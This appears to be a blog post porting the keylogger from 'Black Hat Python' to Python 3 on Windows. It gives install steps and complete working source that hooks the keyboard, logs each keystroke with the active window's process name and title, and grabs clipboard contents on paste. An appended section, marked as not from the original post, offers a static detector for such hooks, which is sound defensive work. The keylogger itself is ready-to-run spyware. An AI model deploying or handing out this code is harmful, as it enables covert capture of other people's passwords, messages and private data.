Implementing a keylogger in Python 3

The book "Python Black Hat: Hackers and Penetration Testing Programming" has a keylogger in its eighth chapter, but because the book's code is written for Python 2, it no longer runs, and there are almost no Python 3 implementations on the Internet, so I tried to implement it myself, but there are still some problems.

The first step is downloading the pythoncom and pyhook packages.
pythoncom:
pip install pywin32
pyhook:
download link: https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook
After downloading the package and saving it in a directory, run pip install xx directly (xx is the location where you saved the package).
But the following error appears when running: TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'
At this point you need to install PyHook3:
pip install PyHook3
Installation details: https://www.cnblogs.com/pmh905001/p/12194504.html

Below is the code

from ctypes import *
import pythoncom
import PyHook3 as pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None


def get_current_process():
    # Get the handle of the topmost window
    hwnd = user32.GetForegroundWindow()  # Get the foreground window handle
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))
    process_id = "%d" % pid.value  # Store the process ID in a variable

    # Allocate memory
    executable = create_string_buffer(1024)
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)  # Get the process name

    # Read the window title
    window_title = create_string_buffer(512)
    length = user32.GetWindowTextA(hwnd, byref(window_title), 512)  # Get the window name

    # Print
    print()
    print("[PID: %s-%s-%s]" % (process_id, executable.value, window_title.value))

    # Close handles
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)


# Define the keystroke event handler
def key_event(event):
    global current_window
    if event.WindowName != current_window:  # Check whether the target switched windows
        current_window = event.WindowName
        get_current_process()
    print(" ")
    if event.Ascii > 32 and event.Ascii < 127:  # Check whether it is a regular key
        print(chr(event.Ascii), end=" ")

    else:
        if event.Key == "V":  # If it is CTRL+V, get the clipboard contents
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print("[PASTE] - %s" % (pasted_value), end=' ')
        else:
            print("[%s]" % event.Key, end=' ')
    # Keep listening for the next keystroke event
    return True  # Pass control to the next hook event


def key_logger():
    hooker = pyHook.HookManager()  # Create the hook manager
    hooker.KeyDown = key_event  # Register the handler for key-down hook events
    hooker.HookKeyboard()  # Install the keyboard hook
    pythoncom.PumpMessages()  # Run


if __name__ == "__main__":
    key_logger()

However, the defect of this code is that it cannot record Chinese characters. The original code for allocating memory was

	# Allocate memory
	executable = create_string_buffer("\x00"*1024)
	h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
	psapi.GetModuleBaseNameA(h_process,None,byref(executable),512) # Get the process name

But when I run it like this, an error is reported [screenshot omitted].
But after the modification, Chinese characters cannot be recorded, so the current code can only record characters.
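
From a detection standpoint, the script above has a distinctive static shape: a PyHook3 keyboard hook with a KeyDown handler, combined with foreground-window and clipboard reads. The following added example (not from the original post) parses Python source with ast, without executing it, and triages that combination; the classify rule, its labels, and both sample strings are constructed assumptions.

```python
import ast

HOOK_MODULES = {"PyHook3", "pyHook"}   # hook libraries named on this page
HOOK_HANDLERS = {"KeyDown", "KeyUp"}   # HookManager callback attributes
WATCHED_CALLS = {"HookKeyboard", "PumpMessages", "GetForegroundWindow", "GetClipboardData"}

def indicators(source):
    """Parse (never execute) Python source and return the indicators it contains."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] + [getattr(node, "module", None) or ""]
            found |= {"import:" + n for n in names if n.split(".")[0] in HOOK_MODULES}
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr in WATCHED_CALLS):
            found.add("call:" + node.func.attr)
        if isinstance(node, ast.Assign):
            found |= {"handler:" + t.attr for t in node.targets
                      if isinstance(t, ast.Attribute) and t.attr in HOOK_HANDLERS}
    return found

def classify(source):
    """Hypothetical triage rule: a hook alone is weaker than hook plus context capture."""
    found = indicators(source)
    hooked = "call:HookKeyboard" in found and any(f.startswith("handler:") for f in found)
    context = found & {"call:GetForegroundWindow", "call:GetClipboardData"}
    if hooked and context:
        return "keylogger-like"
    return "keyboard-hook" if hooked else "no-hook"

# Constructed samples (inert text; only parsed, never run).
SAMPLE_LOGGER = """
import PyHook3 as pyHook
import pythoncom, win32clipboard
from ctypes import windll
def key_event(event):
    windll.user32.GetForegroundWindow()
    win32clipboard.GetClipboardData()
hooker = pyHook.HookManager()
hooker.KeyDown = key_event
hooker.HookKeyboard()
pythoncom.PumpMessages()
"""
SAMPLE_CLIPBOARD_TOOL = """
import win32clipboard
text = win32clipboard.GetClipboardData()
"""

if __name__ == "__main__":
    print(classify(SAMPLE_LOGGER), classify(SAMPLE_CLIPBOARD_TOOL))
```

A static match like this is a triage signal for source files and unpacked scripts, not proof of intent; legitimate hotkey and accessibility tools also install keyboard hooks.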

Origin blog.csdn.net/weixin_45102820/article/details/112688734